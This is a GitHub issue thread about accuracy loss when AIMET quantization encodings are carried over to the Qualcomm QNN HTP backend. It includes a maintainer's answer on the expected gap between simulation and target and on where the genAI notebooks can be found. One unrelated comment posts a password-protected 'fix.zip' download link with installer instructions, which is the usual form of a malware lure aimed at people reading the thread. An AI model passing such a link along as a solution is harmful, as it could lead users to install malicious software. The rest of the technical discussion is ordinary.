### ISSUE TITLE
Will there be precision errors after switching to qnn after Aimet pipline?

### ISSUE THREAD

**Issue by shifeiwen** [quic/aimet#3268]
Hi ,aimet team
I want to know if when I use aimet to generate the encoding file and then use the --quantization_overrides flag when converting to qnn, will the generated NPU backend model lose accuracy again? For example, aimet loss = 1.1 qnn htp backend may be 1.3~1.4 
The reason for this is that I was using qc's genAI notebook to call aimet quantization model, and I found that the loss of the actual generated model was higher than that in aimet.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by My-captain** [comment]
Hi, @shifeiwen , where could I get  the `qc's genAI notebook` ?
I also have some research experience with AIMET and QNN backends. Can we exchange contact information for further communication?

**Comment by quic-klhsieh** [comment]
@shifeiwen , AIMET is not meant to be a bit exact simulation of target accuracy, so some difference will be expected when comparing outputs between sim and target. Typically when comparing accuracy metrics, we can see up to a .5% gap between sim vs. target. Using --quantization_overrides and passing the encodings exported from AIMET is the correct workflow to bring AIMET encodings to target.

@My-captain , you can find some genAI notebooks by signing up for an account at qpm.qualcomm.com (Qualcomm Package Manager), then navigating to Tools -> Qualcomm AI Stack -> Qaulcomm Generative AI Tutorials.

The AIMET version associated with these notebooks is a previous version, and some work may be needed to use the latest AIMET. If any assistance is needed, please raise a discussion in the discussions tab and we will be happy to guide you.
